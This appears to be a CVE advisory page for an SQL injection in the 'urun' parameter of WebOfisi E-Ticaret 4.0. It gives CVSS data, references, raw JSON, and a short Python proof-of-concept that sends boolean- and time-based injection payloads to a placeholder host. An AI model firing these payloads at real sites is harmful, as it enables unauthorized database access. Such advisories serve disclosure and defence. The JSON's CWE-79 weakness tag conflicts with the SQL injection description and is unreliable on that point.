CVE-2018-25210

Description

WebOfisi E-Ticaret 4.0 contains an SQL injection vulnerability in the 'urun' GET parameter of the endpoint that allows unauthenticated attackers to manipulate database queries. Attackers can inject SQL payloads through the 'urun' parameter to execute boolean-based blind, error-based, time-based blind, and stacked query attacks against the backend database.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:web-ofisi:e-ticaret:*:*:*:*:*:*:*:* - VULNERABLE

WebOfisi E-Ticaret 4.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL example, replace with actual vulnerable endpoint
target_url = "http://target.com/vulnerable_page"

# The vulnerable parameter is 'urun'
payloads = [
    "1' AND 1=1-- -",  # Boolean-based True
    "1' AND 1=2-- -",  # Boolean-based False
    "1' OR SLEEP(5)-- -" # Time-based blind
]

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
}

for payload in payloads:
    params = {
        "urun": payload
    }
    try:
        # Send GET request with the payload
        response = requests.get(target_url, params=params, headers=headers, timeout=10)
        print(f"Testing payload: {payload}")
        print(f"Status Code: {response.status_code}")
        print(f"Response Length: {len(response.text)}")
        # Analyze response differences to confirm vulnerability
        if "syntax error" in response.text.lower() or response.elapsed.total_seconds() > 5:
            print("[+] Potential Vulnerability Detected")
        print("-" * 30)
    except requests.RequestException as e:
        print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25210
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25210
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25210/
[4] VulDB https://vuldb.com/cve/CVE-2018-25210
[5] https://drive.google.com/file/d/1ZghFSsYto-Vpv3PXunx8xm2g-Gs3HJwz/view?usp=sharing
[6] https://www.exploit-db.com/exploits/45897
[7] https://www.vulncheck.com/advisories/webofisi-e-ticaret-sql-injection-via-urun-parameter
[8] https://www.web-ofisi.com

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25210", "sourceIdentifier": "[email protected]", "published": "2026-03-26T12:16:06.460", "lastModified": "2026-03-27T18:29:35.243", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WebOfisi E-Ticaret 4.0 contains an SQL injection vulnerability in the 'urun' GET parameter of the endpoint that allows unauthenticated attackers to manipulate database queries. Attackers can inject SQL payloads through the 'urun' parameter to execute boolean-based blind, error-based, time-based blind, and stacked query attacks against the backend database."}, {"lang": "es", "value": "WebOfisi E-Ticaret 4.0 contiene una vulnerabilidad de inyección SQL en el parámetro GET 'urun' del endpoint que permite a atacantes no autenticados manipular consultas de la base de datos. Los atacantes pueden inyectar cargas útiles SQL a través del parámetro 'urun' para ejecutar ataques de inyección SQL ciegos basados en booleanos, basados en errores, ciegos basados en tiempo y de consultas apiladas contra la base de datos de backend."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:web-ofisi:e-ticaret:*:*:*:*:*:*:*:*", "versionEndIncluding": "4.0.0", "matchCriteriaId": "D5D70C89-2D66-4888-BF84-D25741E499D0"}]}]}], "references": [{"url": "https://drive.google.com/file/d/1ZghFSsYto-Vpv3PXunx8xm2g-Gs3HJwz/view?usp=sharing", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://www.exploit-db.com/exploits/45897", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/webofisi-e-ticaret-sql-injection-via-urun-parameter", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.web-ofisi.com", "source": "[email protected]", "tags": ["Product"]}]}}